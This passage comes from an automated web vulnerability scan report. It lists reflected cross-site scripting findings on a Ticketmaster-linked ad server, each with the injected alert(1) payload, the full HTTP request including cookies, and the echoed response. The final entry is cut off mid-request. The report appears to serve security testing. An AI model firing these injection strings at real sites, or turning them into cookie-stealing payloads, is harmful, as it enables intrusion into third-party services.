4.48. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/172548/11408426983@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a7f5"><script>alert(1)</script>9242a2f4cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/172548/11408426983@x011a7f5"><script>alert(1)</script>9242a2f4cf? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/172548/2069848632/x011a7f5"><script>alert(1)</script>9242a2f4cf/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.49. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9911a"><script>alert(1)</script>84e16a5c31d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster9911a"><script>alert(1)</script>84e16a5c31d/AirCanadaCentre/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 347
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster9911a"><script>alert(1)</script>84e16a5c31d/AirCanadaCentre/874685307/x01/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.50. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bff1"><script>alert(1)</script>63db032276e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/AirCanadaCentre8bff1"><script>alert(1)</script>63db032276e/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 407
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre8bff1"><script>alert(1)</script>63db032276e/L12/841953991/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank">
...[SNIP]...

4.51. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5039"><script>alert(1)</script>d70de5c134c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/AirCanadaCentre/11408426983@x01b5039"><script>alert(1)</script>d70de5c134c? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 339
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/AirCanadaCentre/367540465/x01b5039"><script>alert(1)</script>d70de5c134c/default/empty.gif/726348573830334f56626741436d4566?x" target="_top">
...[SNIP]...

4.52. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [&_RM_HTML_artist1_name_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the &_RM_HTML_artist1_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82e01'-alert(1)-'e534d92780 was submitted in the &_RM_HTML_artist1_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u282e01'-alert(1)-'e534d92780&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38440
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u282e01'-alert(1)-'e534d92780';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowla
...[SNIP]...

4.53. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85730"><script>alert(1)</script>f252ad4c94c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster85730"><script>alert(1)</script>f252ad4c94c/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster85730"><script>alert(1)</script>f252ad4c94c/ZAP/1178896253/x01/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.54. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dad46"><script>alert(1)</script>3c85ca57b59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/ZAPdad46"><script>alert(1)</script>3c85ca57b59/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 395
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/ZAPdad46"><script>alert(1)</script>3c85ca57b59/L12/947680874/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/72634857383031536e39414143615847?x" target="_blank">
...[SNIP]...

4.55. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b26"><script>alert(1)</script>27080269c9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ticketmaster/ZAP/1@x01e8b26"><script>alert(1)</script>27080269c9d?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/ZAP/1439981957/x01e8b26"><script>alert(1)</script>27080269c9d/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.56. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_artistid_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_artistid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8408b'-alert(1)-'670ae3e33cf was submitted in the _RM_HTML_artistid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=13082498408b'-alert(1)-'670ae3e33cf&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
